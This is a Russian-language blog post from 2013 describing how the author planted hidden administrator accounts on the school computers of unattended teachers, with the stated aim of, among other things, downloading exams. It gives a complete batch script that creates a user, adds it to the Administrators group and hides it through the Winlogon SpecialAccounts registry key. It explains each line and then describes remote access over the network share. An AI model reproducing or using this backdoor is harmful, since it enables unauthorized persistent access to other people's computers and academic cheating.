SULI COMPANY | Научно-технический сайт Сулико Асабашвили » IT » Безопасность » Взлом локальной сети (метод невидимой учетки)
Информация к новости
  • Просмотров: 2645
  • Автор: sulicompany
  • Дата: 3-08-2013, 22:19
 (голосов: 0)
3-08-2013, 22:19

Взлом локальной сети (метод невидимой учетки)

Категория: IT » Безопасность


Всем привет! Недавно появилась идея, а точнее нужда, взломать все компьютеры в локальной сети лицея. Учителя у нас не ахти, и иногда оставляют компьютер без присмотра на одну-две минуты. Ах да, и пароль они меняют где-то раз в месяц. Иногда бывали случаи, когда нужен был доступ к какому-то компьютеру, а наш пароль никак не подходил(ну там экзамен скачать). Тогда мы решили создать скрытую учетную запись администратора на каждом компьютере.

Вся соль была в том, чтобы сделать это за пару кликов. В этом нам помогут bat-файлы.

 

1
2
3
4
5
6
7
8
9
10
11
12
13
@echo off
 
net user adm mad /add
 
Set AdmGroupSID=S-1-5-32-544
Set AdmGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%AdmGroupSID%'" Get Name /Value ^| Find "="`) Do Set AdmGroup=%%J
Set AdmGroup=%AdmGroup:~0,-1%
 
net localgroup %AdmGroup% /add adm
 
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v adm /t REG_DWORD /d 0 /f

Этот скрипт создает скрытого администратора с именем «adm» и паролем «mad».

(Можете просто поменять в коде их на свои)

Разберем наш код:

1)

1
2
3
@echo off
 
net user adm mad /add

здесь мы создаем пользователя, совсем еще обычного, не администратора.

2)

1
2
3
4
Set AdmGroupSID=S-1-5-32-544
Set AdmGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%AdmGroupSID%'" Get Name /Value ^| Find "="`) Do Set AdmGroup=%%J
Set AdmGroup=%AdmGroup:~0,-1%

теперь нам нужно узнать имя локальной группы администраторов и записать ее в переменную, чтобы позже добавить туда нашего новоиспеченного юзера.

3)

1
net localgroup %AdmGroup% /add adm

после добавления этой строчки наш юзер становится полноценным администратором системы.

4)

1
2
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v adm /t REG_DWORD /d 0 /f

теперь нужно добавить записи в реестр, чтобы нашего юзера никто не видел.

Теперь мы можем создать невидимого администратора на любом компьютере всего за два клика.

Но как нам получить к нему доступ?

Ответ прост- по локальной сети. Объясняю:

1) Узнать айпи компьютера-жертвы на котором вы создали учетку админа. Для этого читайте статью 

2) Теперь уже на любом подключенном к вашей локальной сети компьютере нажмите «Win+R» (запустить «Выполнить»)

3)Потом пишите \\ip адрес компьютера, к примеру \\192.168.0.23 и жмете Enter))

4) Вас просит ввести логин и пароль, тут мы и вводим наш логин и пароль, которые вы указали при создании пользователя. Все, теперь у вас есть доступ к этому компьютеру.